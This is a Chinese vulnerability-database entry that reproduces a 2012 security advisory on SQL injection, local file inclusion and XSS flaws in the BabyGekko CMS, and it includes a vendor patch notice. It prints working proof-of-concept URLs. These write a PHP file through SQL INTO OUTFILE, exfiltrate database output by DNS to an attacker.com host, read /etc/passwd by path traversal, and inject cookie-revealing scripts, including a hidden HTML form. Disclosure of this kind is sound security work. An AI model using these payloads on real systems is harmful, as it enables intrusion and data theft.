BabyGekko 多个输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121414 漏洞类型 输入验证
发布时间 2012-11-15 更新时间 2012-11-21
CVE编号 CVE-2012-5698 CNNVD-ID CNNVD-201211-261
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22741
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201211-261
|漏洞详情
BabyGekko是一款使用PHP语言开发的内容管理系统。BabyGekko中存在多个输入验证漏洞,包括:1.多个SQL注入漏洞2.本地文件包含漏洞3.多个跨站脚本漏洞,这些漏洞源于没有充分验证用户提供的数据。攻击者利用这些漏洞执行任意本地文件,获得敏感信息,窃取基于cookie认证证书,控制应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。
|漏洞EXP
Advisory ID: HTB23122
Product: BabyGekko
Vendor: babygekko.com
Vulnerable Version(s): 1.2.2e and probably prior
Tested Version: 1.2.2e
Vendor Notification: October 24, 2012 
Vendor Patch: November 4, 2012 
Public Disclosure: November 14, 2012 
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700
CVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.


1) Multiple SQL Injections in BabyGekko

Two SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because "/admin/index.php" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. 

1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. 

The following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:

http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20

The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:

http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 

1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.

The following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:

http://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20

The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:

http://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 


2) Local File Inclusion in BabyGekko

The vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. 

The following PoC will show the "/etc/passwd" file:

http://[host]/index.php?app=../../../../../../../etc/passwd%00

Second PoC demonstrates inclusion of "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of "phpinfo()" function execution:

http://[host]/index.php?app=../../../../../../../tmp/


3) Multiple Cross-Site Scripting (XSS) in BabyGekko

3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.

The following PoC code demonstrates the vulnerability:

http://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

3.2 Insufficient sanitation of input passed via the "username" and "password" HTTP POST parameters to the "index.php" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires "loginbox" block to be activated.

The following PoC code demonstrates the vulnerability:


<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to BabyGekko 1.2.2f or 1.2.4

More Information:
http://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip
http://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.
[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|参考资料

来源:BID
名称:56523
链接:http://www.securityfocus.com/bid/56523